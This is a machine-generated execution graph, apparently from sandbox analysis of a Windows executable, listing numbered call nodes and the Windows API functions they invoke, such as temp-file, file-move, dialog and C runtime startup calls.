                                                                                                                                              execution_graph 24885 2f162f 26 API calls std::bad_exception::bad_exception 24887 2fb51b 99 API calls 3 library calls 23193 2e9c34 23194 2e9c47 23193->23194 23200 2e9c40 23193->23200 23195 2e9c4d GetStdHandle 23194->23195 23197 2e9c58 23194->23197 23195->23197 23196 2e9cad WriteFile 23196->23197 23197->23196 23198 2e9c7d WriteFile 23197->23198 23199 2e9c78 23197->23199 23197->23200 23202 2e9d20 23197->23202 23204 2e6c55 60 API calls 23197->23204 23198->23197 23198->23199 23199->23197 23199->23198 23205 2e6e9b 75 API calls 23202->23205 23204->23197 23205->23200 24862 2f9135 10 API calls 24888 2ff230 51 API calls 2 library calls 23357 2ee708 23358 2ee718 23357->23358 23359 2ee710 FreeLibrary 23357->23359 23359->23358 24865 304d18 QueryPerformanceFrequency QueryPerformanceCounter 24827 2f9404 GdipCloneImage GdipAlloc 24867 30191d 48 API calls 23361 30861f 23369 309aa7 23361->23369 23365 30863b 23366 308648 23365->23366 23377 30864b 11 API calls 23365->23377 23368 308633 23370 309990 _abort 5 API calls 23369->23370 23371 309ace 23370->23371 23372 309ae6 TlsAlloc 23371->23372 23375 309ad7 23371->23375 23372->23375 23373 2fe203 DloadUnlock 5 API calls 23374 308629 23373->23374 23374->23368 23376 30859a 20 API calls 2 library calls 23374->23376 23375->23373 23376->23365 23377->23368 23378 2fd200 23380 2fd1ae 23378->23380 23379 2fd53a ___delayLoadHelper2@8 19 API calls 23379->23380 23380->23379 24829 2e1019 29 API calls pre_c_initialization 24830 30940d 21 API calls 24891 2e7a13 GetCurrentProcess GetLastError CloseHandle 24831 306c73 52 API calls 3 library calls 24834 2fe07f 27 API calls pre_c_initialization 24893 30de64 51 API calls 24928 2f877b CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 23207 306f6d 23218 30a7b3 23207->23218 23213 307a50 _free 20 API calls 23214 306fbf 23213->23214 23215 306f95 23216 307a50 _free 20 API calls 23215->23216 23217 306f8a 23216->23217 23217->23213 23219 30a7bc 23218->23219 23220 306f7f 23218->23220 23235 30a6b2 23219->23235 23222 30aba6 GetEnvironmentStringsW 23220->23222 23223 30abbd 23222->23223 23233 30ac10 23222->23233 23226 30abc3 WideCharToMultiByte 23223->23226 23224 306f84 23224->23217 23234 306fc5 26 API calls 3 library calls 23224->23234 23225 30ac19 FreeEnvironmentStringsW 23225->23224 23227 30abdf 23226->23227 23226->23233 23228 307a8a __onexit 21 API calls 23227->23228 23229 30abe5 23228->23229 23230 30ac02 23229->23230 23231 30abec WideCharToMultiByte 23229->23231 23232 307a50 _free 20 API calls 23230->23232 23231->23230 23232->23233 23233->23224 23233->23225 23234->23215 23236 308516 _abort 38 API calls 23235->23236 23237 30a6bf 23236->23237 23255 30a7d1 23237->23255 23239 30a6c7 23264 30a446 23239->23264 23242 30a6de 23242->23220 23243 307a8a __onexit 21 API calls 23244 30a6ef 23243->23244 23254 30a721 23244->23254 23271 30a873 23244->23271 23247 307a50 _free 20 API calls 23247->23242 23248 30a739 23251 30a765 23248->23251 23252 307a50 _free 20 API calls 23248->23252 23249 30a71c 23281 307ecc 20 API calls _abort 23249->23281 23251->23254 23282 30a31c 26 API calls 23251->23282 23252->23251 23254->23247 23256 30a7dd ___scrt_is_nonwritable_in_current_image 23255->23256 23257 308516 _abort 38 API calls 23256->23257 23258 30a7e7 23257->23258 23262 30a86b ___scrt_is_nonwritable_in_current_image 23258->23262 23263 307a50 _free 20 API calls 23258->23263 23283 307ad8 38 API calls _abort 23258->23283 23284 309931 EnterCriticalSection 23258->23284 23285 30a862 LeaveCriticalSection _abort 23258->23285 23262->23239 23263->23258 23265 303356 __cftof 38 API calls 23264->23265 23266 30a458 23265->23266 23267 30a467 GetOEMCP 23266->23267 23268 30a479 23266->23268 23270 30a490 23267->23270 23269 30a47e GetACP 23268->23269 23268->23270 23269->23270 23270->23242 23270->23243 23272 30a446 40 API calls 23271->23272 23273 30a892 23272->23273 23274 30a899 23273->23274 23277 30a8e3 IsValidCodePage 23273->23277 23280 30a908 ___scrt_get_show_window_mode 23273->23280 23275 2fe203 DloadUnlock 5 API calls 23274->23275 23276 30a714 23275->23276 23276->23248 23276->23249 23277->23274 23278 30a8f5 GetCPInfo 23277->23278 23278->23274 23278->23280 23286 30a51e GetCPInfo 23280->23286 23281->23254 23282->23254 23284->23258 23285->23258 23288 30a558 23286->23288 23295 30a602 23286->23295 23296 30b5ea 23288->23296 23290 2fe203 DloadUnlock 5 API calls 23292 30a6ae 23290->23292 23292->23274 23294 3097c2 __vswprintf_c_l 43 API calls 23294->23295 23295->23290 23297 303356 __cftof 38 API calls 23296->23297 23298 30b60a MultiByteToWideChar 23297->23298 23300 30b648 23298->23300 23307 30b6e0 23298->23307 23302 307a8a __onexit 21 API calls 23300->23302 23308 30b669 __vsnwprintf_l ___scrt_get_show_window_mode 23300->23308 23301 2fe203 DloadUnlock 5 API calls 23303 30a5b9 23301->23303 23302->23308 23310 3097c2 23303->23310 23304 30b6da 23315 30980d 20 API calls _free 23304->23315 23306 30b6ae MultiByteToWideChar 23306->23304 23309 30b6ca GetStringTypeW 23306->23309 23307->23301 23308->23304 23308->23306 23309->23304 23311 303356 __cftof 38 API calls 23310->23311 23312 3097d5 23311->23312 23316 3095a5 23312->23316 23315->23307 23318 3095c0 __vswprintf_c_l 23316->23318 23317 3095e6 MultiByteToWideChar 23319 309610 23317->23319 23320 30979a 23317->23320 23318->23317 23325 307a8a __onexit 21 API calls 23319->23325 23327 309631 __vsnwprintf_l 23319->23327 23321 2fe203 DloadUnlock 5 API calls 23320->23321 23322 3097ad 23321->23322 23322->23294 23323 3096e6 23352 30980d 20 API calls _free 23323->23352 23324 30967a MultiByteToWideChar 23324->23323 23326 309693 23324->23326 23325->23327 23343 309c64 23326->23343 23327->23323 23327->23324 23331 3096f5 23333 307a8a __onexit 21 API calls 23331->23333 23337 309716 __vsnwprintf_l 23331->23337 23332 3096bd 23332->23323 23334 309c64 __vswprintf_c_l 11 API calls 23332->23334 23333->23337 23334->23323 23335 30978b 23351 30980d 20 API calls _free 23335->23351 23337->23335 23338 309c64 __vswprintf_c_l 11 API calls 23337->23338 23339 30976a 23338->23339 23339->23335 23340 309779 WideCharToMultiByte 23339->23340 23340->23335 23341 3097b9 23340->23341 23353 30980d 20 API calls _free 23341->23353 23344 309990 _abort 5 API calls 23343->23344 23345 309c8b 23344->23345 23347 309c94 23345->23347 23354 309cec 10 API calls 3 library calls 23345->23354 23349 2fe203 DloadUnlock 5 API calls 23347->23349 23348 309cd4 LCMapStringW 23348->23347 23350 3096aa 23349->23350 23350->23323 23350->23331 23350->23332 23351->23323 23352->23320 23353->23323 23354->23348 24895 2fce71 19 API calls ___delayLoadHelper2@8 24931 30ab56 GetCommandLineA GetCommandLineW 24932 2e5f46 80 API calls 24897 309e43 27 API calls 3 library calls 23382 2fbb5b 23383 2fbb64 GetTempPathW 23382->23383 23400 2fb51b _wcsrchr 23382->23400 23388 2fbb84 23383->23388 23385 2e3e41 _swprintf 51 API calls 23385->23388 23386 2fc0c4 23387 2e9e6b 4 API calls 23387->23388 23388->23385 23388->23387 23389 2fbbbb SetDlgItemTextW 23388->23389 23393 2fbbd9 _wcschr 23389->23393 23389->23400 23391 2fb808 SetWindowTextW 23391->23400 23395 2fbcc5 EndDialog 23393->23395 23393->23400 23395->23400 23396 302b5e 22 API calls 23396->23400 23398 2fb5f9 SetFileAttributesW 23401 2fb6b4 GetFileAttributesW 23398->23401 23411 2fb5ec ___scrt_get_show_window_mode 23398->23411 23400->23386 23400->23391 23400->23396 23400->23411 23413 2f1410 CompareStringW 23400->23413 23414 2f95f8 GetCurrentDirectoryW 23400->23414 23415 2ea215 7 API calls 23400->23415 23418 2ea19e FindClose 23400->23418 23419 2fa2ae 76 API calls ___std_exception_copy 23400->23419 23420 2fa156 ExpandEnvironmentStringsW 23400->23420 23403 2fb6c2 DeleteFileW 23401->23403 23401->23411 23403->23411 23405 2fb9d2 GetDlgItem SetWindowTextW SendMessageW 23405->23411 23406 2e3e41 _swprintf 51 API calls 23408 2fb6f7 GetFileAttributesW 23406->23408 23407 2fba14 SendMessageW 23407->23400 23409 2fb708 MoveFileW 23408->23409 23408->23411 23410 2fb720 MoveFileExW 23409->23410 23409->23411 23410->23411 23411->23398 23411->23400 23411->23405 23411->23406 23411->23407 23412 2fb690 SHFileOperationW 23411->23412 23416 2eb1b7 52 API calls 2 library calls 23411->23416 23417 2ea215 7 API calls 23411->23417 23412->23401 23413->23400 23414->23400 23415->23400 23416->23411 23417->23411 23418->23400 23419->23400 23420->23400 23425 2fcb57 23426 2fcb64 23425->23426 23433 2eda42 23426->23433 23429 2e3e41 _swprintf 51 API calls 23430 2fcb8a SetDlgItemTextW 23429->23430 23436 2fa388 PeekMessageW 23430->23436 23441 2eda70 23433->23441 23437 2fa3dc 23436->23437 23438 2fa3a3 GetMessageW 23436->23438 23439 2fa3b9 IsDialogMessageW 23438->23439 23440 2fa3c8 TranslateMessage DispatchMessageW 23438->23440 23439->23437 23439->23440 23440->23437 23447 2ecf19 23441->23447 23444 2eda6d 23444->23429 23445 2eda93 LoadStringW 23445->23444 23446 2edaaa LoadStringW 23445->23446 23446->23444 23452 2ece52 23447->23452 23449 2ecf36 23450 2ecf4b 23449->23450 23460 2ecf57 26 API calls 23449->23460 23450->23444 23450->23445 23453 2ece6d 23452->23453 23459 2ece66 _strncpy 23452->23459 23454 2ece91 23453->23454 23461 2f11fa WideCharToMultiByte 23453->23461 23456 2ecec2 23454->23456 23462 2ed9dc 50 API calls __vsnprintf 23454->23462 23463 304e71 26 API calls 3 library calls 23456->23463 23459->23449 23460->23450 23461->23454 23462->23456 23463->23459 24898 2e1e54 128 API calls __EH_prolog 24838 2e1050 82 API calls pre_c_initialization 24873 2fb51b 109 API calls 4 library calls 24839 2f6cac 116 API calls 24936 3093b7 31 API calls 2 library calls 24900 2fc2a7 69 API calls 22948 2fd1a4 19 API calls ___delayLoadHelper2@8 22950 2fd7bf 22951 2fd7c9 22950->22951 22954 2fd53a 22951->22954 22982 2fd248 22954->22982 22956 2fd554 22957 2fd5b1 22956->22957 22971 2fd5d5 22956->22971 22993 2fd4b8 11 API calls 3 library calls 22957->22993 22959 2fd5bc RaiseException 22960 2fd7aa 22959->22960 22962 2fe203 DloadUnlock 5 API calls 22960->22962 22961 2fd64d LoadLibraryExA 22963 2fd6ae 22961->22963 22964 2fd660 GetLastError 22961->22964 22965 2fd7b9 22962->22965 22966 2fd6b9 FreeLibrary 22963->22966 22970 2fd6c0 22963->22970 22967 2fd689 22964->22967 22968 2fd673 22964->22968 22966->22970 22994 2fd4b8 11 API calls 3 library calls 22967->22994 22968->22963 22968->22967 22969 2fd71e GetProcAddress 22973 2fd72e GetLastError 22969->22973 22977 2fd77c 22969->22977 22970->22969 22970->22977 22971->22961 22971->22963 22971->22970 22971->22977 22975 2fd741 22973->22975 22974 2fd694 RaiseException 22974->22960 22975->22977 22995 2fd4b8 11 API calls 3 library calls 22975->22995 22996 2fd4b8 11 API calls 3 library calls 22977->22996 22979 2fd762 RaiseException 22980 2fd248 ___delayLoadHelper2@8 11 API calls 22979->22980 22981 2fd779 22980->22981 22981->22977 22983 2fd27a 22982->22983 22984 2fd254 22982->22984 22983->22956 22997 2fd2f6 8 API calls DloadUnlock 22984->22997 22986 2fd259 22987 2fd275 22986->22987 22998 2fd448 VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22986->22998 22999 2fd27b GetModuleHandleW GetProcAddress GetProcAddress 22987->22999 22990 2fd505 22991 2fe203 DloadUnlock 5 API calls 22990->22991 22992 2fd536 22991->22992 22992->22956 22993->22959 22994->22974 22995->22979 22996->22960 22997->22986 22998->22987 22999->22990 24842 30aca1 GetProcessHeap 24844 2e94b8 79 API calls 24937 2fafb9 92 API calls _swprintf 24874 2fe1b6 20 API calls 24845 2fa0b0 96 API calls 24938 2f9b8d 72 API calls 24939 310b96 CloseHandle 23360 2e1382 82 API calls 3 library calls 24906 2fda82 38 API calls 2 library calls 24849 301480 6 API calls 3 library calls 24907 2e169e 84 API calls 24850 30e081 21 API calls __vswprintf_c_l 24851 2f589e 123 API calls __vswprintf_c_l 23464 2e1092 23469 2e5a1d 23464->23469 23470 2e5a27 __EH_prolog 23469->23470 23476 2ead1b 23470->23476 23472 2e5a33 23482 2e5c12 GetCurrentProcess GetProcessAffinityMask 23472->23482 23477 2ead25 __EH_prolog 23476->23477 23483 2ee6f0 80 API calls 23477->23483 23479 2ead37 23484 2eae33 23479->23484 23483->23479 23485 2eae45 ___scrt_get_show_window_mode 23484->23485 23488 2f05b4 23485->23488 23491 2f0574 GetCurrentProcess GetProcessAffinityMask 23488->23491 23492 2eadad 23491->23492 23492->23472 23494 2fe091 23495 2fe09d ___scrt_is_nonwritable_in_current_image 23494->23495 23520 2fdba6 23495->23520 23497 2fe0a4 23499 2fe0cd 23497->23499 23600 2fe4f5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23497->23600 23508 2fe10c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23499->23508 23531 3077c5 23499->23531 23503 2fe0ec ___scrt_is_nonwritable_in_current_image 23504 2fe16c 23539 2fe610 23504->23539 23508->23504 23601 3067f9 38 API calls 2 library calls 23508->23601 23515 2fe198 23517 2fe1a1 23515->23517 23602 306c00 28 API calls _abort 23515->23602 23603 2fdd1d 13 API calls 2 library calls 23517->23603 23521 2fdbaf 23520->23521 23604 2fe34b IsProcessorFeaturePresent 23521->23604 23523 2fdbbb 23605 3015e6 23523->23605 23525 2fdbc0 23526 2fdbc4 23525->23526 23614 307652 23525->23614 23526->23497 23529 2fdbdb 23529->23497 23534 3077dc 23531->23534 23532 2fe203 DloadUnlock 5 API calls 23533 2fe0e6 23532->23533 23533->23503 23535 307769 23533->23535 23534->23532 23536 307798 23535->23536 23537 2fe203 DloadUnlock 5 API calls 23536->23537 23538 3077c1 23537->23538 23538->23508 23664 2fe920 23539->23664 23542 2fe172 23543 307716 23542->23543 23544 30a7b3 51 API calls 23543->23544 23546 30771f 23544->23546 23545 2fe17b 23548 2fcbb8 23545->23548 23546->23545 23666 30ab3e 38 API calls 23546->23666 23667 2efd49 23548->23667 23552 2fcbd7 23716 2f9aa0 23552->23716 23554 2fcbe0 23720 2f1017 GetCPInfo 23554->23720 23556 2fcbea ___scrt_get_show_window_mode 23557 2fcbfd GetCommandLineW 23556->23557 23558 2fcc0c 23557->23558 23559 2fcc8a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23557->23559 23760 2fb356 81 API calls 23558->23760 23560 2e3e41 _swprintf 51 API calls 23559->23560 23562 2fccf3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23560->23562 23723 2fa4f8 LoadBitmapW 23562->23723 23563 2fcc12 23565 2fcc1a OpenFileMappingW 23563->23565 23566 2fcc84 23563->23566 23569 2fcc7a CloseHandle 23565->23569 23570 2fcc33 MapViewOfFile 23565->23570 23762 2fc891 SetEnvironmentVariableW SetEnvironmentVariableW 23566->23762 23569->23559 23572 2fcc44 __vswprintf_c_l 23570->23572 23573 2fcc71 UnmapViewOfFile 23570->23573 23761 2fc891 SetEnvironmentVariableW SetEnvironmentVariableW 23572->23761 23573->23569 23578 2f83fc 8 API calls 23580 2fcd4c DialogBoxParamW 23578->23580 23579 2fcc60 23579->23573 23581 2fcd86 23580->23581 23582 2fcd98 Sleep 23581->23582 23583 2fcd9f 23581->23583 23582->23583 23586 2fcdad 23583->23586 23750 2f9ca1 23583->23750 23585 2fcdcc DeleteObject 23587 2fcde6 23585->23587 23588 2fcde3 DeleteObject 23585->23588 23586->23585 23589 2fce29 23587->23589 23590 2fce17 23587->23590 23588->23587 23758 2f9b08 23589->23758 23591 2fc8f0 3 API calls 23590->23591 23592 2fce1d CloseHandle 23591->23592 23592->23589 23594 2fce63 23595 306b34 GetModuleHandleW 23594->23595 23596 2fe18e 23595->23596 23596->23515 23597 306c5d 23596->23597 23935 3069da 23597->23935 23600->23497 23601->23504 23602->23517 23603->23503 23604->23523 23606 3015eb ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23605->23606 23618 30268e 23606->23618 23609 3015f9 23609->23525 23611 301601 23612 30160c 23611->23612 23632 3026ca DeleteCriticalSection 23611->23632 23612->23525 23660 30acbc 23614->23660 23617 30160f 8 API calls 3 library calls 23617->23526 23619 302697 23618->23619 23621 3026c0 23619->23621 23622 3015f5 23619->23622 23633 302905 23619->23633 23638 3026ca DeleteCriticalSection 23621->23638 23622->23609 23624 301726 23622->23624 23653 30281a 23624->23653 23626 301730 23631 30173b 23626->23631 23658 3028c8 6 API calls try_get_function 23626->23658 23628 301756 23628->23611 23629 301749 23629->23628 23659 301759 6 API calls ___vcrt_FlsFree 23629->23659 23631->23611 23632->23609 23639 3026f9 23633->23639 23636 30293c InitializeCriticalSectionAndSpinCount 23637 302928 23636->23637 23637->23619 23638->23622 23640 30272d 23639->23640 23643 302729 23639->23643 23640->23636 23640->23637 23641 30274d 23641->23640 23644 302759 GetProcAddress 23641->23644 23643->23640 23643->23641 23646 302799 23643->23646 23645 302769 __crt_fast_encode_pointer 23644->23645 23645->23640 23647 3027c1 LoadLibraryExW 23646->23647 23648 3027b6 23646->23648 23649 3027f5 23647->23649 23650 3027dd GetLastError 23647->23650 23648->23643 23649->23648 23651 30280c FreeLibrary 23649->23651 23650->23649 23652 3027e8 LoadLibraryExW 23650->23652 23651->23648 23652->23649 23654 3026f9 try_get_function 5 API calls 23653->23654 23655 302834 23654->23655 23656 30284c TlsAlloc 23655->23656 23657 30283d 23655->23657 23657->23626 23658->23629 23659->23631 23663 30acd5 23660->23663 23661 2fe203 DloadUnlock 5 API calls 23662 2fdbcd 23661->23662 23662->23529 23662->23617 23663->23661 23665 2fe623 GetStartupInfoW 23664->23665 23665->23542 23666->23546 23668 2fd940 23667->23668 23669 2efd53 GetModuleHandleW 23668->23669 23670 2efdbe 23669->23670 23671 2efd6d GetProcAddress 23669->23671 23674 2f00f3 GetModuleFileNameW 23670->23674 23772 306662 42 API calls __vsnwprintf_l 23670->23772 23672 2efd96 GetProcAddress 23671->23672 23673 2efd86 23671->23673 23672->23670 23675 2efda2 23672->23675 23673->23672 23687 2f010e 23674->23687 23675->23670 23677 2f0031 23677->23674 23678 2f003c GetModuleFileNameW CreateFileW 23677->23678 23679 2f006b SetFilePointer 23678->23679 23680 2f00e7 CloseHandle 23678->23680 23679->23680 23681 2f007b ReadFile 23679->23681 23680->23674 23681->23680 23684 2f009a 23681->23684 23684->23680 23686 2efcfd 2 API calls 23684->23686 23685 2f0143 CompareStringW 23685->23687 23686->23684 23687->23685 23688 2f0179 GetFileAttributesW 23687->23688 23689 2f018d 23687->23689 23763 2ea995 23687->23763 23766 2efcfd 23687->23766 23688->23687 23688->23689 23690 2f019a 23689->23690 23692 2f01cc 23689->23692 23693 2f01b2 GetFileAttributesW 23690->23693 23694 2f01c6 23690->23694 23691 2f02db 23715 2f95f8 GetCurrentDirectoryW 23691->23715 23692->23691 23695 2ea995 GetVersionExW 23692->23695 23693->23690 23693->23694 23694->23692 23696 2f01e6 23695->23696 23697 2f01ed 23696->23697 23698 2f0253 23696->23698 23700 2efcfd 2 API calls 23697->23700 23699 2e3e41 _swprintf 51 API calls 23698->23699 23701 2f027b AllocConsole 23699->23701 23702 2f01f7 23700->23702 23703 2f0288 GetCurrentProcessId AttachConsole 23701->23703 23704 2f02d3 ExitProcess 23701->23704 23705 2efcfd 2 API calls 23702->23705 23773 302b33 23703->23773 23707 2f0201 23705->23707 23709 2eda42 53 API calls 23707->23709 23708 2f02a9 GetStdHandle WriteConsoleW Sleep FreeConsole 23708->23704 23710 2f021c 23709->23710 23711 2e3e41 _swprintf 51 API calls 23710->23711 23712 2f022f 23711->23712 23713 2eda42 53 API calls 23712->23713 23714 2f023e 23713->23714 23714->23704 23715->23552 23717 2efcfd 2 API calls 23716->23717 23718 2f9ab4 OleInitialize 23717->23718 23719 2f9ad7 GdiplusStartup SHGetMalloc 23718->23719 23719->23554 23721 2f103b IsDBCSLeadByte 23720->23721 23721->23721 23722 2f1053 23721->23722 23722->23556 23724 2fa519 23723->23724 23725 2fa522 GetObjectW 23723->23725 23780 2f963a 12 API calls __vswprintf_c_l 23724->23780 23775 2f952a 23725->23775 23728 2fa520 23728->23725 23730 2fa575 23742 2ecfab 23730->23742 23731 2fa555 23782 2f958c GetDC GetDeviceCaps ReleaseDC 23731->23782 23732 2fa543 23781 2f963a 12 API calls __vswprintf_c_l 23732->23781 23735 2fa54a 23735->23731 23737 2fa550 DeleteObject 23735->23737 23736 2fa55d 23783 2f9549 GetDC GetDeviceCaps ReleaseDC 23736->23783 23737->23731 23739 2fa566 23784 2f975d 8 API calls ___scrt_get_show_window_mode 23739->23784 23741 2fa56d DeleteObject 23741->23730 23787 2ecfd0 23742->23787 23744 2ecfb7 23827 2ed6c1 GetModuleHandleW FindResourceW 23744->23827 23747 2f83fc 23922 2fd82c 23747->23922 23751 2f9cae 23750->23751 23754 2f9d3c 23751->23754 23931 2f1432 23751->23931 23753 2f9cd6 23753->23754 23934 2f9a8d SetCurrentDirectoryW 23753->23934 23754->23586 23756 2f9ce4 ___scrt_get_show_window_mode 23757 2f9d18 SHFileOperationW 23756->23757 23757->23754 23759 2f9b2e GdiplusShutdown CoUninitialize 23758->23759 23759->23594 23760->23563 23761->23579 23762->23559 23764 2ea9a9 GetVersionExW 23763->23764 23765 2ea9e5 23763->23765 23764->23765 23765->23687 23767 2fd940 23766->23767 23768 2efd0a GetSystemDirectoryW 23767->23768 23769 2efd22 23768->23769 23770 2efd40 23768->23770 23771 2efd33 LoadLibraryW 23769->23771 23770->23687 23771->23770 23772->23677 23774 302b3b 23773->23774 23774->23708 23774->23774 23785 2f9549 GetDC GetDeviceCaps ReleaseDC 23775->23785 23777 2f9531 23778 2f953d 23777->23778 23786 2f958c GetDC GetDeviceCaps ReleaseDC 23777->23786 23778->23730 23778->23731 23778->23732 23780->23728 23781->23735 23782->23736 23783->23739 23784->23741 23785->23777 23786->23778 23788 2ecfde _wcschr __EH_prolog 23787->23788 23789 2ed00d GetModuleFileNameW 23788->23789 23790 2ed03e 23788->23790 23791 2ed027 23789->23791 23829 2e9768 23790->23829 23791->23790 23794 2ed09a 23840 305030 26 API calls 3 library calls 23794->23840 23796 2f3393 76 API calls 23799 2ed06e 23796->23799 23798 2ed0ad 23841 305030 26 API calls 3 library calls 23798->23841 23799->23794 23799->23796 23822 2ed2ba 23799->23822 23801 2ed1f6 23802 2e9a4c 77 API calls 23801->23802 23801->23822 23805 2ed210 ___std_exception_copy 23802->23805 23806 2e9979 80 API calls 23805->23806 23805->23822 23809 2ed239 ___std_exception_copy 23806->23809 23808 2ed0bf 23808->23801 23808->23822 23842 2e9b57 23808->23842 23857 2e9979 23808->23857 23865 2e9a4c 23808->23865 23809->23822 23824 2ed245 ___std_exception_copy 23809->23824 23870 2f0fde MultiByteToWideChar 23809->23870 23811 2ed3bb 23871 2ecb33 76 API calls 23811->23871 23813 2ed683 23876 2ecb33 76 API calls 23813->23876 23815 2ed673 23815->23744 23816 2ed3fe 23872 305030 26 API calls 3 library calls 23816->23872 23818 2ed418 23873 305030 26 API calls 3 library calls 23818->23873 23819 2ed3cf 23819->23816 23821 2f3393 76 API calls 23819->23821 23821->23819 23850 2e946e 23822->23850 23823 2f11fa WideCharToMultiByte 23823->23824 23824->23811 23824->23813 23824->23815 23824->23822 23824->23823 23874 2ed9dc 50 API calls __vsnprintf 23824->23874 23875 304e71 26 API calls 3 library calls 23824->23875 23828 2ecfbe 23827->23828 23828->23747 23830 2e9772 23829->23830 23831 2e97f1 CreateFileW 23830->23831 23832 2e9862 23831->23832 23833 2e9811 GetLastError 23831->23833 23835 2e9899 23832->23835 23837 2e987f SetFileTime 23832->23837 23834 2eb32c 2 API calls 23833->23834 23836 2e9831 23834->23836 23835->23799 23836->23832 23838 2e9835 CreateFileW GetLastError 23836->23838 23837->23835 23839 2e9859 23838->23839 23839->23832 23840->23798 23841->23808 23843 2e9b6a 23842->23843 23844 2e9b7b SetFilePointer 23842->23844 23846 2e9bb4 23843->23846 23877 2e6de2 75 API calls 23843->23877 23845 2e9b99 GetLastError 23844->23845 23844->23846 23845->23846 23848 2e9ba3 23845->23848 23846->23808 23848->23846 23878 2e6de2 75 API calls 23848->23878 23851 2e94a3 23850->23851 23852 2e9492 23850->23852 23851->23744 23852->23851 23853 2e949e 23852->23853 23854 2e94a5 23852->23854 23879 2e9621 23853->23879 23884 2e94da 23854->23884 23859 2e9990 23857->23859 23860 2e99e3 23859->23860 23862 2e99f1 23859->23862 23864 2e99f3 23859->23864 23899 2e964a 23859->23899 23911 2e6da8 75 API calls 23860->23911 23862->23808 23863 2e964a 5 API calls 23863->23864 23864->23862 23864->23863 23916 2e9903 23865->23916 23868 2e9a77 23868->23808 23870->23824 23871->23819 23872->23818 23873->23822 23874->23824 23875->23824 23876->23815 23877->23844 23878->23846 23880 2e962e 23879->23880 23881 2e962a 23879->23881 23880->23881 23890 2e9e18 23880->23890 23881->23851 23885 2e9504 23884->23885 23886 2e94e6 23884->23886 23887 2e9523 23885->23887 23898 2e6c7b 74 API calls 23885->23898 23886->23885 23888 2e94f2 CloseHandle 23886->23888 23887->23851 23888->23885 23891 2fd940 23890->23891 23892 2e9e25 DeleteFileW 23891->23892 23893 2e9e38 23892->23893 23894 2e9648 23892->23894 23895 2eb32c 2 API calls 23893->23895 23894->23851 23896 2e9e4c 23895->23896 23896->23894 23897 2e9e50 DeleteFileW 23896->23897 23897->23894 23898->23887 23900 2e9658 GetStdHandle 23899->23900 23901 2e9663 ReadFile 23899->23901 23900->23901 23902 2e967c 23901->23902 23909 2e969c 23901->23909 23912 2e9745 23902->23912 23904 2e9683 23905 2e96a4 GetLastError 23904->23905 23906 2e96b3 23904->23906 23910 2e9691 23904->23910 23905->23906 23905->23909 23907 2e96c3 GetLastError 23906->23907 23906->23909 23907->23909 23907->23910 23908 2e964a GetFileType 23908->23909 23909->23859 23910->23908 23911->23862 23913 2e974e GetFileType 23912->23913 23914 2e974b 23912->23914 23915 2e975c 23913->23915 23914->23904 23915->23904 23917 2e996e 23916->23917 23920 2e990f 23916->23920 23917->23868 23921 2e6de2 75 API calls 23917->23921 23918 2e9946 SetFilePointer 23918->23917 23919 2e9964 GetLastError 23918->23919 23919->23917 23920->23918 23921->23868 23925 2fd831 ___std_exception_copy 23922->23925 23923 2f841b 23923->23578 23925->23923 23928 306763 7 API calls 2 library calls 23925->23928 23929 2fe2bb RaiseException Concurrency::cancel_current_task new 23925->23929 23930 2fe29e RaiseException Concurrency::cancel_current_task 23925->23930 23928->23925 23933 2f143f 23931->23933 23932 2f1472 CompareStringW 23932->23753 23933->23932 23934->23756 23936 3069e6 _abort 23935->23936 23937 3069fe 23936->23937 23939 306b34 _abort GetModuleHandleW 23936->23939 23957 309931 EnterCriticalSection 23937->23957 23940 3069f2 23939->23940 23940->23937 23972 306b78 GetModuleHandleExW 23940->23972 23941 306aa4 23961 306ae4 23941->23961 23945 306a7b 23946 306a93 23945->23946 23951 307769 _abort 5 API calls 23945->23951 23952 307769 _abort 5 API calls 23946->23952 23947 306a06 23947->23941 23947->23945 23958 3074e0 23947->23958 23948 306ac1 23964 306af3 23948->23964 23949 306aed 23980 310ec9 5 API calls DloadUnlock 23949->23980 23951->23946 23952->23941 23957->23947 23981 307219 23958->23981 24000 309979 LeaveCriticalSection 23961->24000 23963 306abd 23963->23948 23963->23949 24001 309d6e 23964->24001 23967 306b21 23970 306b78 _abort 8 API calls 23967->23970 23968 306b01 GetPEB 23968->23967 23969 306b11 GetCurrentProcess TerminateProcess 23968->23969 23969->23967 23971 306b29 ExitProcess 23970->23971 23973 306ba2 GetProcAddress 23972->23973 23974 306bc5 23972->23974 23975 306bb7 23973->23975 23976 306bd4 23974->23976 23977 306bcb FreeLibrary 23974->23977 23975->23974 23978 2fe203 DloadUnlock 5 API calls 23976->23978 23977->23976 23979 306bde 23978->23979 23979->23937 23984 3071c8 23981->23984 23983 30723d 23983->23945 23985 3071d4 ___scrt_is_nonwritable_in_current_image 23984->23985 23992 309931 EnterCriticalSection 23985->23992 23987 3071e2 23993 307269 23987->23993 23991 307200 ___scrt_is_nonwritable_in_current_image 23991->23983 23992->23987 23996 307289 23993->23996 23997 307291 23993->23997 23994 2fe203 DloadUnlock 5 API calls 23995 3071ef 23994->23995 23999 30720d LeaveCriticalSection _abort 23995->23999 23996->23994 23997->23996 23998 307a50 _free 20 API calls 23997->23998 23998->23996 23999->23991 24000->23963 24002 309d93 24001->24002 24006 309d89 24001->24006 24003 309990 _abort 5 API calls 24002->24003 24003->24006 24004 2fe203 DloadUnlock 5 API calls 24005 306afd 24004->24005 24005->23967 24005->23968 24006->24004 22909 3098f0 22910 3098fb 22909->22910 22912 309924 22910->22912 22913 309920 22910->22913 22915 309c02 22910->22915 22922 309948 DeleteCriticalSection 22912->22922 22923 309990 22915->22923 22918 309c47 InitializeCriticalSectionAndSpinCount 22919 309c32 22918->22919 22930 2fe203 22919->22930 22921 309c5e 22921->22910 22922->22913 22924 3099c0 22923->22924 22927 3099bc 22923->22927 22924->22918 22924->22919 22925 3099e0 22925->22924 22928 3099ec GetProcAddress 22925->22928 22927->22924 22927->22925 22937 309a2c 22927->22937 22929 3099fc __crt_fast_encode_pointer 22928->22929 22929->22924 22931 2fe20e IsProcessorFeaturePresent 22930->22931 22932 2fe20c 22930->22932 22934 2fe837 22931->22934 22932->22921 22944 2fe7fb 